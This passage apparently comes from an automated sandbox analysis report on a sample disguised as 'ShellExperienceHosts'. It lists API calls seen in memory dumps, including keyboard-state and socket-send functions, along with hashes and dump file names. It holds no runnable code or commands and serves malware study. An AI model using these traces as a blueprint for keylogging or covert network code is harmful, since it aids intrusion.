                                                                            • __EH_prolog3.LIBCMT ref: 6C746D10
                                                                              • Part of subcall function 6C7513D1: __EH_prolog3.LIBCMT ref: 6C7513D8
                                                                              • Part of subcall function 6C7513D1: SetRectEmpty.USER32(?), ref: 6C7515CE
                                                                              • Part of subcall function 6C7E7A0F: __EH_prolog3.LIBCMT ref: 6C7E7A16
                                                                            • SetRectEmpty.USER32(?), ref: 6C746DBC
                                                                            • SetRectEmpty.USER32(?), ref: 6C746DC3
                                                                            • SetRectEmpty.USER32 ref: 6C746E1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EmptyRect$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 3752103406-0
                                                                            • Opcode ID: 3952d0244c6c2cf551c847a4437c1a5be43bca7e3f3e63a85a5729ac7b80ddd3
                                                                            • Instruction ID: 97638f70e8a6a6227af63eacec5908401e60a555594ba0c243c2d7b69485a6e7
                                                                            • Opcode Fuzzy Hash: 3952d0244c6c2cf551c847a4437c1a5be43bca7e3f3e63a85a5729ac7b80ddd3
                                                                            • Instruction Fuzzy Hash: AA31FFB19056508FCB15CF28C5886C9BBB4BF08704F5885BEE89D9F346CBB45608CFA5
                                                                            Function 6C700F75 Relevance: 6.1, APIs: 4, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyMenu.USER32(?,05BCD017,?,?,?,Function_001C6030,000000FF), ref: 6C700FC6
                                                                            • IsWindow.USER32(?), ref: 6C700FD7
                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C700FEB
                                                                            • Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6C701048
                                                                              • Part of subcall function 6C7D99C2: GetParent.USER32(00000000), ref: 6C7D9A49
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ContextExternal$BaseBase::~Concurrency::details::DestroyMenuMessageParentSendWindow
                                                                            • String ID:
                                                                            • API String ID: 3377428259-0
                                                                            • Opcode ID: 5de5bf2e61c5fe6c0c5eb956821a021e8a8258329e807b74f14e6d7138c83e06
                                                                            • Instruction ID: 639e151f49366c4ecaccd1e297963e80d0ae5b1e4f5398d1839b60fe2a944812
                                                                            • Opcode Fuzzy Hash: 5de5bf2e61c5fe6c0c5eb956821a021e8a8258329e807b74f14e6d7138c83e06
                                                                            • Instruction Fuzzy Hash: 0F21CC70205B419BD725DF34CA94AEAB7F8FF46358F10082DE46A93B80DB34B44ACB44
                                                                            Function 02234357 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F), ref: 022343C3
                                                                              • Part of subcall function 02231377: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 022313A2
                                                                              • Part of subcall function 02234C27: HeapFree.KERNEL32(?,00000000,?,00000000,02234E0C,?,0223429F,02234E0C,00000000,?,00000001,02234E0C,?), ref: 02234C4E
                                                                            • SetLastError.KERNEL32(00000000,?), ref: 022343AE
                                                                            • SetLastError.KERNEL32(00000057), ref: 022343D8
                                                                            • WSAGetLastError.WS2_32(?), ref: 022343E7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$Heap$AllocateFree
                                                                            • String ID:
                                                                            • API String ID: 2037364846-0
                                                                            • Opcode ID: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction ID: 316e0732f1e463aa855edf3ba91bb206ff858e5be85af68018ec01e44d3e9d63
                                                                            • Opcode Fuzzy Hash: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction Fuzzy Hash: 6B11E772A1512897C711FFE9A8845EEB7A4EF89322B1441A7ED0CDB204D735C9108AD0
                                                                            Function 10004380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F), ref: 100043EC
                                                                              • Part of subcall function 100013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 100013CB
                                                                              • Part of subcall function 10004C50: HeapFree.KERNEL32(?,00000000,?,00000000,10004E35,?,100042C8,10004E35,00000000,?,00000001,10004E35,?), ref: 10004C77
                                                                            • SetLastError.KERNEL32(00000000,?), ref: 100043D7
                                                                            • SetLastError.KERNEL32(00000057), ref: 10004401
                                                                            • WSAGetLastError.WS2_32(?), ref: 10004410
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$Heap$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 1906775185-0
                                                                            • Opcode ID: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction ID: af902972c3ae3a33560ac4961c645c5895ff77c926fb996934c7b8e77325769a
                                                                            • Opcode Fuzzy Hash: 127eb3da1a419b9376193c7e08546e54e028199608b7fbb35670fae08a1c63d3
                                                                            • Instruction Fuzzy Hash: CA11CA76B055289BE700DFA9E8845DEB7A8EF883B2B0541B6FD0CD7204DA35DD0546D4
                                                                            Function 0223E5AE Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 0223E5BC
                                                                              • Part of subcall function 02236E5A: __FF_MSGBANNER.LIBCMT ref: 02236E73
                                                                              • Part of subcall function 02236E5A: __NMSG_WRITE.LIBCMT ref: 02236E7A
                                                                              • Part of subcall function 02236E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02236E9F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_malloc
                                                                            • String ID:
                                                                            • API String ID: 501242067-0
                                                                            • Opcode ID: 19c8f705b293d0e43781c04c81f056510b7f67a69813665bbbd607d0321c1977
                                                                            • Instruction ID: cd0a70cec79a7d76f2ebdc0fe7a10d956758eab1c63609f6d159bb46790620c9
                                                                            • Opcode Fuzzy Hash: 19c8f705b293d0e43781c04c81f056510b7f67a69813665bbbd607d0321c1977
                                                                            • Instruction Fuzzy Hash: B411E7F3430712AADF232FF4980475E3B9AAF84371F128025F9098A158DF71C844CE95
                                                                            Function 6C6EAD01 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(00000000), ref: 6C75A996
                                                                              • Part of subcall function 6C7585C2: GetWindowRect.USER32(?,?), ref: 6C7585D6
                                                                              • Part of subcall function 6C7585C2: GetParent.USER32(?), ref: 6C75862C
                                                                              • Part of subcall function 6C7585C2: GetParent.USER32(?), ref: 6C75863F
                                                                            • ScreenToClient.USER32(?,?), ref: 6C75A9C0
                                                                            • SetCapture.USER32(?), ref: 6C75A9EA
                                                                            • GetWindowRect.USER32(?,?), ref: 6C75AA2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ParentRectWindow$CaptureClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 3234571238-0
                                                                            • Opcode ID: f529d5b77e749bc4ebed7fa497b1ba43aff85eee2b0b288e3207d2907aa0a3d2
                                                                            • Instruction ID: 41bc286f60e0d930300c39b0d4d6df5ea9d45e0688ac4d896468c3f2848a9741
                                                                            • Opcode Fuzzy Hash: f529d5b77e749bc4ebed7fa497b1ba43aff85eee2b0b288e3207d2907aa0a3d2
                                                                            • Instruction Fuzzy Hash: 3621BBB0A00209EFDB05CB64C888BEDBBB9FF89319F1002A9E40597240DF75A955CBA0
                                                                            Function 02233BC7 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAEventSelect.WS2_32(02233A92,00000001,00000023), ref: 02233BD9
                                                                            • WSAGetLastError.WS2_32 ref: 02233BE4
                                                                            • send.WS2_32(00000001,00000000,00000000,00000000), ref: 02233C2F
                                                                            • WSAGetLastError.WS2_32 ref: 02233C3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$EventSelectsend
                                                                            • String ID:
                                                                            • API String ID: 259408233-0
                                                                            • Opcode ID: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction ID: 6509acb1c8bacf536d502138de03fc65f994bfc9a7f04f4525f9dc383dc3dd4a
                                                                            • Opcode Fuzzy Hash: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction Fuzzy Hash: 9811A0B1210710ABD321DFB9CCC8A47B6F9FB88725F004A2DE956C7A94C736E840CB50
                                                                            Function 10003BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAEventSelect.WS2_32(10003ABB,00000001,00000023), ref: 10003C02
                                                                            • WSAGetLastError.WS2_32 ref: 10003C0D
                                                                            • send.WS2_32(00000001,00000000,00000000,00000000), ref: 10003C58
                                                                            • WSAGetLastError.WS2_32 ref: 10003C63
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$EventSelectsend
                                                                            • String ID:
                                                                            • API String ID: 259408233-0
                                                                            • Opcode ID: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction ID: 2cb4a202ed201c3bbb9feb76d4ba786ae7603a0bc4fad51836a507335b835d1f
                                                                            • Opcode Fuzzy Hash: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
                                                                            • Instruction Fuzzy Hash: 19116AB6600710ABE320CB79C8C8A47B7E9FB88750B014A2DE956C7690C732E8008B50
                                                                            Function 0223F338 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: ae93d8e1f55e07757358dedb40a48924b5c9eaccb3bbb51606774fe5ac62a377
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: 47116DB242428ABBCF175EC4ED11CEE3F23BF08254B098814FE1858534C73AC9B1AB81
                                                                            Function 031BB7AA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: d1fe79b298e8ae640e8af806342f721fa666114f9223f8de2d7d07bcd5403fae
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: D5117B7600818ABBCF12AF85CC51CEE3F32BB0C250F098414FA5858930C336C9B1AB81
                                                                            Function 1000F361 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction ID: 466f4f1e7ae25f0961f396d3557a49c78803b8d6a6677ae74fd306ec2772594f
                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                            • Instruction Fuzzy Hash: 08114E3640018AFBDF129E84CC41CEE3F62FB083A4B558419FE6859439C336DAB1BB81
                                                                            Function 6C760411 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemCount.USER32(00000000), ref: 6C760421
                                                                            • GetSubMenu.USER32(00000000,-00000001), ref: 6C760430
                                                                            • GetMenuItemCount.USER32(00000000), ref: 6C76043D
                                                                            • GetMenuItemID.USER32(00000000,00000000), ref: 6C760453
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$Count
                                                                            • String ID:
                                                                            • API String ID: 879546783-0
                                                                            • Opcode ID: 92a08af33d631113d1a0c1e6beaf65aa7f47702a0dad565460f1bdef91dc4205
                                                                            • Instruction ID: c0af3319726501cee1824785e3bd0e9b79686f92117d55e1aeb2bc3da4a5ea6b
                                                                            • Opcode Fuzzy Hash: 92a08af33d631113d1a0c1e6beaf65aa7f47702a0dad565460f1bdef91dc4205
                                                                            • Instruction Fuzzy Hash: BF01A2B0601195AFDF218F76CA9C69E7EB8DB06349F104435FC15E2A00D630DE40C798
                                                                            Function 6C7ECF43 Relevance: 6.0, APIs: 4, Instructions: 47keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 6C7ECF5D
                                                                            • GetKeyboardLayout.USER32(?), ref: 6C7ECF83
                                                                            • MapVirtualKeyW.USER32(?,00000000), ref: 6C7ECF90
                                                                            • ToUnicodeEx.USER32(?,00000000,?,?,00000002,00000000,00000000), ref: 6C7ECFAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Keyboard$LayoutStateUnicodeVirtual
                                                                            • String ID:
                                                                            • API String ID: 961187839-0
                                                                            • Opcode ID: fdb9698b9b25f8e2d7935b0813d4233d85feaab6b757db84a422c2814032279e
                                                                            • Instruction ID: 53832555c2a47650d12119845ed374008ec52b7872c10019a0f435fd8c8d129a
                                                                            • Opcode Fuzzy Hash: fdb9698b9b25f8e2d7935b0813d4233d85feaab6b757db84a422c2814032279e
                                                                            • Instruction Fuzzy Hash: 89017176600208ABDF64ABA0CD0DFDE7B78AF19748F404478B646D7580DB70AA48CB94
                                                                            Function 6C70EFCA Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CopyRect.USER32(00000000,00000000), ref: 6C70EFFC
                                                                            • InflateRect.USER32(00000000,000000FF,000000FF), ref: 6C70F013
                                                                            • InvalidateRect.USER32(00000000,00000000,00000000,?,00000000), ref: 6C70F027
                                                                            • UpdateWindow.USER32(00000000), ref: 6C70F030
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CopyInflateInvalidateUpdateWindow
                                                                            • String ID:
                                                                            • API String ID: 1253262389-0
                                                                            • Opcode ID: 9b04796b200c9fd304f4dce6c7d4c09040a1cfbff44a072616190de0b7970f8a
                                                                            • Instruction ID: 89a699045e5ae8e7925e71d8e5b5ea9fbe2af280e86500b1edce1c5d375cd28a
                                                                            • Opcode Fuzzy Hash: 9b04796b200c9fd304f4dce6c7d4c09040a1cfbff44a072616190de0b7970f8a
                                                                            • Instruction Fuzzy Hash: A90156B1605605ABCF20DF68CA08A9FB7F8BF49358F100639F55193590DB70E905C794
                                                                            Function 10004AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM(00000001,?,00000001,?,10003C4F,?,?,00000001), ref: 10004AF5
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 10004B04
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 10004B11
                                                                            • timeGetTime.WINMM(?,00000001,?,10003C4F,?,?,00000001), ref: 10004B28
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: IncrementInterlockedTimetime
                                                                            • String ID:
                                                                            • API String ID: 159728177-0
                                                                            • Opcode ID: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
                                                                            • Instruction ID: 0a1d15bd5f988d4bea10877f224db5579cb700bf5039280ae9249a62ae1a06e8
                                                                            • Opcode Fuzzy Hash: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
                                                                            • Instruction Fuzzy Hash: E20116B5601705AFD720DFBAC88098AFBF9EF4C650701892EE549CB611E771EA448FE0
                                                                            Function 6C73CD14 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 6C73CD1E
                                                                            • GetTopWindow.USER32(00000000), ref: 6C73CD2B
                                                                              • Part of subcall function 6C73CD14: GetWindow.USER32(00000000,00000002), ref: 6C73CD7A
                                                                            • GetTopWindow.USER32(?), ref: 6C73CD5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
